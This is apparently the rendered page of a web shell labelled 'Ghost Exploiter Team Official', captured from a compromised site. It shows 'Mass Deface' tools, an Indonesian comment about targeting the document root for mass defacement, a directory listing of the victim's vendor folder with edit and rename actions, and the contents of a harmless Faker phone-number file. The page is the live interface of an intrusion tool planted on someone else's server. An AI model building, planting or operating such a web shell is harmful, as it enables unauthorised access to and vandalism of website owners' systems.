webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
fakerphp
/
faker
/
src
/
Faker
/
Provider
/
es_ES
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Address.php
6.015KB
edt
ren
Color.php
0.402KB
edt
ren
Company.php
8.331KB
edt
ren
Internet.php
0.359KB
edt
ren
Payment.php
1.233KB
edt
ren
Person.php
13.23KB
edt
ren
PhoneNumber.php
1.017KB
edt
ren
Text.php
295.409KB
edt
ren
<?php namespace Faker\Provider\es_ES; class PhoneNumber extends \Faker\Provider\PhoneNumber { protected static $formats = [ '+34 9## ## ####', '+34 9## ######', '+34 9########', '+34 9##-##-####', '+34 9##-######', '9## ## ####', '9## ######', '9########', '9##-##-####', '9##-######', ]; protected static $mobileFormats = [ '+34 6## ## ####', '+34 6## ######', '+34 6########', '+34 6##-##-####', '+34 6##-######', '6## ## ####', '6## ######', '6########', '6##-##-####', '6##-######', ]; protected static $tollFreeFormats = [ '900 ### ###', '800 ### ###', ]; public static function mobileNumber() { return static::numerify(static::randomElement(static::$mobileFormats)); } public static function tollFreeNumber() { return static::numerify(static::randomElement(static::$tollFreeFormats)); } }
<=Back
Liking